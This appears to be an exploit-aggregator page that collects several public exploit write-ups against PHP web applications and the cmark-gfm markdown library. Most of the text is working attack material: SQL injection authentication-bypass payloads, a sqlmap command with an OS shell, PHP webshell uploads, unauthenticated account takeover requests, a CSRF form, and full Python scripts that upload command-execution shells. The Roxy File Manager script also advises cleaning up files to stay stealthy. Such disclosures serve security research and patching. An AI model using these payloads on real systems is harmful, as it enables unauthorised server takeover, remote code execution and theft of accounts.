Latest exploits :: CodePwn

<pre><code># Title: Bakery Shop Management System 1.0 - Blind Time SQLi To Rce # Author: Hejap Zairy # Date: 06.04.2022 # Vendor: https://www.campcodes.com/projects/php/simple-bakery-shop-management-system/ # Software: https://www.campcodes.com/wp-content/uploads/2022/02/bsms_0.zip # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache # Steps # 1.- Go to : https://0day.gov/bsms/login.php # 2 - SQLi Authentication Bypass [admin'or 1=1 or ''='] # 3 - SQLi To RCE r00t # 4 - Ubload webshell # 5 - Web Shell to meterpreter full tty shell #vulnerability Code php --- ``` <?php $sql = "SELECT p.*,c.name as cname FROM `product_list` p inner join `category_list` c on p.category_id = c.category_id where p.status = 1 and p.delete_flag = 0 order by `name` asc"; $qry = $conn->query($sql); while($row = $qry->fetch_assoc()): $stock_in = $conn->query("SELECT sum(quantity) as `total` FROM `stock_list` where unix_timestamp(CONCAT(`expiry_date`, ' 23:59:59')) >= unix_timestamp(CURRENT_TIMESTAMP) and product_id = '{$row['product_id']}' ")->fetch_array()['total']; $stock_out = $conn->query("SELECT sum(quantity) as `total` FROM `transaction_items` where product_id = '{$row['product_id']}' ")->fetch_array()['total']; $stock_in = $stock_in > 0 ? $stock_in : 0; $stock_out = $stock_out > 0 ? $stock_out : 0; $qty = $stock_in-$stock_out; $qty = $qty > 0 ? $qty : 0; ?> ``` --- #Status: CRITICAL [+] Payload POST --- POST /bsms/Actions.php?a=login HTTP/1.1 Host: 0day.gov User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 48 Origin: http://0day.gov Connection: close Referer: https://0day.gov/bsms/login.php Cookie: PHPSESSID=ttdhr0ntd2dte05a2quob2kr3s username=admin'or+1%3D1+or+''%3D'&password=hejap --- --- Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=admin'or 1=1 or ''='' AND (SELECT 1610 FROM (SELECT(SLEEP(515)))eFaV) AND '515'='515&password=hejap --- #Blind SQLi Time to Rce #ُExploit sqlmap -r hejap_0day --dbs --time-sec=10 --threads=10 -D bsms_db -T user_list --dump --eta --technique=t --os-shell # Description: The SQLi vulnerability We can use this information to construct an injection attack to bypass authentication. # Proof and Exploit: https://i.imgur.com/zR6Mekg.png https://i.imgur.com/RQ1JXeK.png https://i.imgur.com/0x9gepw.png </code></pre>

<pre><code>cmark-gfm: Integer overflow in table extension cmark-gfm (Github's markdown parsing library) is vulnerable to an out-of-bounds write when parsing markdown tables with a high number of columns due to an overflow of the 16bit columns count. Support for parsing tables in a github flavored markdown file is implemented in extensions/table.c. When a potential table is found, try_opening_table_header is called to parse the table header row (e.g | Column 1 | Column 2 |) and the delimiter/marker row (| - | :-|): ``` static cmark_node *try_opening_table_header(cmark_syntax_extension *self, cmark_parser *parser, cmark_node *parent_container, unsigned char *input, int len) { ... // Since scan_table_start was successful, we must have a marker row. marker_row = row_from_string(self, parser, input + cmark_parser_get_first_nonspace(parser), len - cmark_parser_get_first_nonspace(parser)); \u2026 header_row = row_from_string(self, parser, (unsigned char *)parent_string, (int)strlen(parent_string)); if (!header_row || header_row->n_columns != marker_row->n_columns) { free_table_row(parser->mem, marker_row); free_table_row(parser->mem, header_row); cmark_arena_pop(); return parent_container; } \u2026 ``` When both rows are parsed successfully, try_opening_table_header creates the alignments array to store alignment information for each column in the table: ``` uint8_t *alignments = (uint8_t *)parser->mem->calloc(header_row->n_columns, sizeof(uint8_t)); cmark_llist *it = marker_row->cells; for (i = 0; it; it = it->next, ++i) { node_cell *node = (node_cell *)it->data; bool left = node->buf->ptr[0] == ':', right = node->buf->ptr[node->buf->size - 1] == ':'; if (left && right) alignments[i] = 'c'; else if (left) alignments[i] = 'l'; else if (right) alignments[i] = 'r'; } ``` The code uses the number of columns in the header row as the size of the array allocation, but loops through all columns in the marker row when filling the array. Normally, this isn't a problem as `header_row->n_columns == marker_row->n_columns` is checked earlier in the code. But, the check doesn't work when the real number of columns is larger than `2**16` as n_columns is defined as a uint16_t and row_from_string does not perform any checks to protect it from overflowing. An attacker can simply create a header row with X columns, a marker row with `2**16+X` columns and trigger out-of-bounds writes at controlled offsets by setting the alignment of specific columns. Proof of Concept; ``` $ python3 -c 'print(\"|a|b|\ |-|-|\ |\"+ \"A\"*1380000 + \"|b|\ \ \ \"+\"|\" + \"a|\" * 2 + \"\ |\" + \":-|\" * (2**16+2) + \"\ |a|b|\")' > /tmp/test.md $ ./src/cmark-gfm -e table /tmp/test.md ================================================================= ==2096092==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f3aeaffd800 at pc 0x7f3affa99ca1 bp 0x7fffbb4d5390 sp 0x7fffbb4d5388 WRITE of size 1 at 0x7f3aeaffd800 thread T0 #0 0x7f3affa99ca0 in try_opening_table_header /usr/local/google/home/fwilhelm/code/cmark-gfm/extensions/table.c:294 #1 0x7f3affa99ca0 in try_opening_table_block /usr/local/google/home/fwilhelm/code/cmark-gfm/extensions/table.c:390 #2 0x7f3aff9e536c in open_new_blocks /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:1286 #3 0x7f3aff9e536c in S_process_line /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:1476 #4 0x7f3aff9e6ea0 in S_parser_feed /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:730 #5 0x7f3aff9e73fc in cmark_parser_feed /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:680 #6 0x563777eaafe4 in main /usr/local/google/home/fwilhelm/code/cmark-gfm/src/main.c:281 #7 0x7f3aff7fa7ec in __libc_start_main ../csu/libc-start.c:332 #8 0x563777eaa2f9 in _start (/usr/local/google/home/fwilhelm/code/cmark-gfm/build/src/cmark-gfm+0x32f9) 0x7f3aeaffd800 is located 0 bytes to the right of 9437184-byte region [0x7f3aea6fd800,0x7f3aeaffd800) allocated by thread T0 here: #0 0x7f3affb58987 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154 #1 0x7f3affa265a6 in alloc_arena_chunk /usr/local/google/home/fwilhelm/code/cmark-gfm/src/arena.c:19 #2 0x7f3affa267a8 in arena_calloc /usr/local/google/home/fwilhelm/code/cmark-gfm/src/arena.c:76 #3 0x7f3affa26a06 in cmark_llist_append /usr/local/google/home/fwilhelm/code/cmark-gfm/src/linked_list.c:7 #4 0x7f3affa99204 in row_from_string /usr/local/google/home/fwilhelm/code/cmark-gfm/extensions/table.c:165 #5 0x7f3affa995cc in try_opening_table_header /usr/local/google/home/fwilhelm/code/cmark-gfm/extensions/table.c:241 #6 0x7f3affa995cc in try_opening_table_block /usr/local/google/home/fwilhelm/code/cmark-gfm/extensions/table.c:390 #7 0x7f3aff9e536c in open_new_blocks /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:1286 #8 0x7f3aff9e536c in S_process_line /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:1476 #9 0x7f3aff9e6ea0 in S_parser_feed /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:730 #10 0x7f3aff9e73fc in cmark_parser_feed /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:680 #11 0x563777eaafe4 in main /usr/local/google/home/fwilhelm/code/cmark-gfm/src/main.c:281 #12 0x7f3aff7fa7ec in __libc_start_main ../csu/libc-start.c:332 SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/local/google/home/fwilhelm/code/cmark-gfm/extensions/table.c:294 in try_opening_table_header Shadow bytes around the buggy address: 0x0fe7dd5f7ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe7dd5f7ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe7dd5f7ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe7dd5f7ae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe7dd5f7af0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0fe7dd5f7b00:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe7dd5f7b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe7dd5f7b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe7dd5f7b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe7dd5f7b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe7dd5f7b50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2096092==ABORTING ``` (The first table is used to fill the arena allocator and trigger a clean crash report from ASAN. It's not required to trigger the bug) This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-05-16. For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html Related CVE Numbers: CVE-2022-24724. Found by: fwilhelm@google.com </code></pre>

<pre><code># Title: SAP Information System 1.0 Shell Upload # Author: Hejap Zairy # Date: 05.04.2022 # Vendor: https://www.sourcecodester.com/php/15262/sap-information-system-using-phppdo-oop.html # Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/SAP_Information_System.zip # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache registered user can bypass waf upload .php.jpg files in attachments section with use of intercept tool in burbsuite to edit the raw #vulnerability Code php Needs more filtering to upload profile files ``` <script> $(document).ready(function() { load_data(); var count = 1; function load_data() { $(document).on('click', '.edit-image', function() { var beneficiaries_id = $(this).data("image"); get_image(beneficiaries_id); //argument }); } function get_image(beneficiaries_id) { $.ajax({ type: 'POST', url: 'fetch_row/beneficiaries_row.php', data: { beneficiaries_id: beneficiaries_id }, dataType: 'json', success: function(response3) { $('#img_beneficiariesid').val(response3.beneficiaries_id); $('#img_imageprofile').attr("src", '../../'+ response3.image_profile.slice(0));//image } }); } }); </script> ``` [+] Payload POST ``` POST /SAP_Information_System/controllers/edit_householdImage.php HTTP/1.1 Host: 0day.gov User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------3440160751499277351272200964 Content-Length: 1343 Origin: http://0day.gov Connection: close Referer: http://0day.gov/SAP_Information_System/Dashboard/pages/Beneficiaries.php Cookie: PHPSESSID=rcumpt42s3tngl4b74i4ndrpl9 -----------------------------3440160751499277351272200964 Content-Disposition: form-data; name="image_profile"; filename="0day_hejap.png.php" Content-Type: image/jpg <?=`$_GET[515]`?> -----------------------------3440160751499277351272200964 Content-Disposition: form-data; name="beneficiaries_id" 5 -----------------------------3440160751499277351272200964-- ``` #Status: CRITICAL [+] Payload GET ``` GET /SAP_Information_System/Uploads/0day_Hejap.php?515=echo+Hejap+Zairy HTTP/1.1 Host: 0day.gov User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 ``` #Response ``` HTTP/1.1 200 OK Date: Tue, 05 Apr 2022 17:56:20 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27 X-Powered-By: PHP/7.4.27 Content-Length: 12 Connection: close Content-Type: text/html; charset=UTF-8 Hejap Zairy ``` # Description: The file upload bypass WAF vulnerability occurs when the user uploads an executable script file, and through the script file to obtain the ability to execute server-side commands. This attack is the most direct and effective, sometimes having almost no technical barriers. # Proof and Exploit: https://i.imgur.com/65biZn6.png https://i.imgur.com/kNOA8dT.png https://i.imgur.com/LMlTPww.png </code></pre>

<pre><code># Exploit Title: Multi Store Inventory Management System - Account Takeover (Unauthenticated) # Date: 04/04/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.bdtask.com/ # Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/ # Version: 1.0 # Tested on: XAMPP, Windows 10 # Contact: https://twitter.com/dmaral3noz # Description : An attacker can takeover any registered 'Staff' user account by just sending below POST request By changing the the "id", "email", "password" , "firstname" and "lastname" parameters #Steps to Reproduce : 1. Send the below POST request by changing "id", "email", "password" parameters. 2. Log in to the user account by changed email and password. ################################################ POST /multistore_demo/dashboard/home/setting HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------246162487211952414471071914687 Content-Length: 1645 Origin: http://localhost Connection: close Referer: http://localhost/multistore_demo/dashboard/home/setting Cookie: ci_session=31504fa8fdcd43505beff1b210056ec12d5d8405 Upgrade-Insecure-Requests: 1 -----------------------------246162487211952414471071914687 Content-Disposition: form-data; name="id" 1 -----------------------------246162487211952414471071914687 Content-Disposition: form-data; name="firstname" saud -----------------------------246162487211952414471071914687 Content-Disposition: form-data; name="lastname" test -----------------------------246162487211952414471071914687 Content-Disposition: form-data; name="email" s3od@hi.com -----------------------------246162487211952414471071914687 Content-Disposition: form-data; name="password" admin123 -----------------------------246162487211952414471071914687 Content-Disposition: form-data; name="about" -----------------------------246162487211952414471071914687 Content-Disposition: form-data; name="old_image" -----------------------------246162487211952414471071914687 Content-Disposition: form-data; name="image"; filename="" Content-Type: application/octet-stream -----------------------------246162487211952414471071914687-- </code></pre>

<pre><code># Exploit Title: Online Banquet Booking System - 'change admin credentials' Cross-Site Request Forgery (CSRF) # Date: 04/04/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/online-banquet-booking-system-using-php-and-mysql/ # Version: 1.0 # Tested on: XAMPP, Linux # Contact: https://twitter.com/dmaral3noz # Description : The application is not using any security token to prevent it against CSRF. Therefore, malicious user can change admin credentials by using crafted post request. # HTTPS Request : POST /obbs/admin/admin-profile.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 86 Origin: http://localhost Connection: close Referer: http://localhost/obbs/admin/admin-profile.php Cookie: PHPSESSID=5lotcnigq4mddq3rr6tnnlvn3e Upgrade-Insecure-Requests: 1 adminname=Admin&username=admin&email=admin%40gmail.com&mobilenumber=5689784589&submit= # Poc Html : <html>  <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/obbs/admin/admin-profile.php" method="POST"> <input type="hidden" name="adminname" value="Admin" /> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="email" value="admin@gmail.com" /> <input type="hidden" name="mobilenumber" value="123" /> <input type="hidden" name="submit" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> </code></pre>

<pre><code># Exploit Title: Gadget Store Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 04/04/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.campcodes.com/ # Software Link: https://www.campcodes.com/projects/php/gadget-store-management-system/ # Version: 1.0 # Tested on: XAMPP, Linux # Contact: https://twitter.com/dmaral3noz *- url "http://localhost:80/gadgetsdb/addproduct.php" *- Path File : http://localhost/gadgetsdb/upload/shell.php --------------------------------------------------- #!/bin/env python3 import requests print (''' #################################################################################################### # Gadget Store Management System 1.0 - Remote Code Execution (Unauthenticated) # # BY:Saud Alenazi # # 0xSaudi # #################################################################################################### ''') url = "http://localhost:80/gadgetsdb/addproduct.php" saud0 = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------4587377838466971711694098865", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/gadgetsdb/product.php", "Upgrade-Insecure-Requests": "1"} saud1 = "-----------------------------4587377838466971711694098865\r\nContent-Disposition: form-data; name=\"pname\"\r\n\r\ntest\r\n-----------------------------4587377838466971711694098865\r\nContent-Disposition: form-data; name=\"category\"\r\n\r\n4\r\n-----------------------------4587377838466971711694098865\r\nContent-Disposition: form-data; name=\"price\"\r\n\r\n100\r\n-----------------------------4587377838466971711694098865\r\nContent-Disposition: form-data; name=\"photo\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php\r\nif($_REQUEST['s']) {\r\n system($_REQUEST['s']);\r\n } else phpinfo();\r\n?>\r\n</pre>\r\n</body>\r\n</html>\r\n-----------------------------4587377838466971711694098865--\r\n" requests.post(url, headers=saud0, data=saud1) </code></pre>

<pre><code># Exploit Title: Roxy File Manager 1.4.5 PHP File Upload Restriction Bypass # Exploit Author: Adam Shebani (NULLHE4D) # Date: 07/03/2022 # Software: Roxy File Manager # Version: 1.4.5 # CVE: CVE-2018-20525 # Vendor Homepage: http://www.roxyfileman.com/ # Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-php # Tested on: PHP 7.2 on Ubuntu 20.04 LTS and PHP 7.4 on Windows 10 # Roxy File Manager 1.4.5 restricts uploading files with certain # extensions, including various PHP extensions. These forbidden # extensions are configured in a file called 'conf.json' at the root # of the file manager's code base. Sections #1 and #1.1 at # https://www.exploit-db.com/exploits/46085 demonstrate a directory # traversal vulnerability that allows exfiltrating arbitrary # directories by copying them to a directory accessible through the # file manager's web interface. The same vulnerability can be used # to overwrite the 'conf.json' file by copying a directory # containing a modified configuration file that has been uploaded. # The directory must have the same name as the original # configuration file's parent directory (usually 'fileman'). The # source and destination directories will be merged and files from # the destination directory get overwritten by the ones from the # source if they have the same name. import argparse, requests, json, re from urllib.parse import urlparse, quote_plus from random import randint #from os import remove from os.path import isfile def failure(): print("[*] it is advised to manually cleanup any files/directories created on the target by this exploit") exit(1) argparser = argparse.ArgumentParser() argparser.add_argument("-u", "--url", type=str, action="store", help="The URL to the target Roxy File Manager instance (e.g. http://localhost/fileman/)", required=True) argparser.add_argument("-f", "--file", type=str, action="store", help="The PHP file to upload (e.g. shell.php)", required=True) args = argparser.parse_args() roxy_url = args.url php_file = args.file if not isfile(php_file): print("[-] specified PHP file not found") exit(1) user_agent = "Mozilla/5.0 (Windows NT 6.4; rv:75.0.0) Gecko/20100101 Firefox/75.0.0" headers = {"User-Agent": user_agent} form_headers = {"User-Agent": user_agent, "Content-Type": "application/x-www-form-urlencoded"} roxy_url += "" if roxy_url.endswith("/") else "/" roxy_hostname = urlparse(roxy_url).hostname uploads_path = urlparse(roxy_url).path + "Uploads" # verify Roxy File Manager instance res = requests.get(roxy_url, headers=headers, allow_redirects=False) if res.status_code == 200 and "<title>Roxy file manager</title>" in res.text: print("[+] verified Roxy File Manager instance at " + roxy_url) else: print("[-] couldn't find a Roxy File Manager instance at the specified URL") exit(1) # get conf.json url = roxy_url + "conf.json" res = requests.get(url, headers=headers) if res.status_code == 200: orig_conf = res.text orig_conf_json = json.loads(orig_conf) extensions = orig_conf_json["FORBIDDEN_UPLOADS"].split() if not "php" in extensions: print("[*] PHP files are already not forbidden from being uploaded") exit(0) else: print("[-] couldn't find conf.json") exit(1) # verify directory traversal vulnerability in fileslist url = roxy_url + "php/fileslist.php" body = "d={}&type=".format(quote_plus(uploads_path+"/..")) res = requests.post(url, headers=form_headers, data=body) res_json = json.loads(res.text) if res.status_code == 200 and len(res_json) > 0 and "conf.json" in res.text: print("[+] verified directory traversal vulnerability in fileslist") else: print("[-] couldn't verify directory traversal vulnerability in fileslist") exit(1) # create fileman directory structure url = roxy_url + "php/createdir.php" random_dirname = "".join([str(randint(0,9)) for i in range(10)]) body = "d={}&n={}".format(quote_plus(uploads_path), random_dirname) res = requests.post(url, headers=form_headers, data=body) if not '"res":"ok"' in res.text: print("[-] failed to create fileman directory structure") exit(1) tmp_path = uploads_path + "/" + random_dirname body = "d={}&n={}".format(quote_plus(tmp_path), "fileman") res = requests.post(url, headers=form_headers, data=body) if not '"res":"ok"' in res.text: print("[-] failed to create fileman directory structure") failure() fileman_path = tmp_path + "/fileman" # upload modified conf.json url = roxy_url + "php/upload.php" modified_conf = re.sub("\sphp\s", " ", orig_conf) with open("conf.json", "w") as conf_file: conf_file.write(modified_conf) body = {"action": (None, "upload"), "method": (None, "ajax"), "d": (None, fileman_path), "files[]": open("conf.json", "rb")} res = requests.post(url, headers=headers, files=body) #remove("conf.json") if '"res":"ok"' in res.text: print("[+] created fileman directory structure with modified conf.json") else: print("[-] failed to upload modified conf.json") failure() # overwrite server conf.json with copydir directory traversal vulnerability url = roxy_url + "php/copydir.php" body = "d={}&n={}".format(quote_plus(fileman_path), quote_plus(uploads_path+"/../..")) res = requests.post(url, headers=form_headers, data=body) if '"res":"ok"' in res.text: print("[+] overwritten server conf.json using copydir directory traversal") else: print("[-] failed to overwrite server conf.json using copydir directory traversal") failure() # upload php file url = roxy_url + "php/upload.php" body = {"action": (None, "upload"), "method": (None, "ajax"), "d": (None, tmp_path), "files[]": open(php_file, "rb")} res = requests.post(url, headers=headers, files=body) if '"res":"ok"' in res.text: print("[+] successfully uploaded PHP file") print("[*] you can manually request the file at: " + "/".join(roxy_url.split("/")[:3]) + tmp_path + "/" + php_file) print("[*] don't forget to delete this as well as it's containing directory using the file manager if you wanna be stealthy") else: print("[-] failed to upload PHP file") failure() # restore original conf.json and cleanup unwanted files/dirs url = roxy_url + "php/deletefile.php" body = "f=" + quote_plus(fileman_path+"/conf.json") res = requests.post(url, headers=form_headers, data=body) if not '"res":"ok"' in res.text: print("[-] failed to cleanup") failure() url = roxy_url + "php/upload.php" with open("conf.json", "w") as conf_file: conf_file.write(orig_conf) body = {"action": (None, "upload"), "method": (None, "ajax"), "d": (None, fileman_path), "files[]": open("conf.json", "rb")} res = requests.post(url, headers=headers, files=body) #remove("conf.json") if not '"res":"ok"' in res.text: print("[-] failed to cleanup") failure() url = roxy_url + "php/copydir.php" body = "d={}&n={}".format(quote_plus(fileman_path), quote_plus(uploads_path+"/../..")) res = requests.post(url, headers=form_headers, data=body) if '"res":"ok"' in res.text: print("[+] original conf.json restored") else: print("[-] failed to cleanup") failure() url = roxy_url + "php/deletefile.php" body = "f=" + quote_plus(fileman_path+"/conf.json") res = requests.post(url, headers=form_headers, data=body) if not '"res":"ok"' in res.text: print("[-] failed to cleanup") failure() url = roxy_url + "php/deletedir.php?d=" + quote_plus(fileman_path) res = requests.get(url, headers=headers) if '"res":"ok"' in res.text: print("[+] cleanup finished successfully") else: print("[-] failed to cleanup") failure() </code></pre>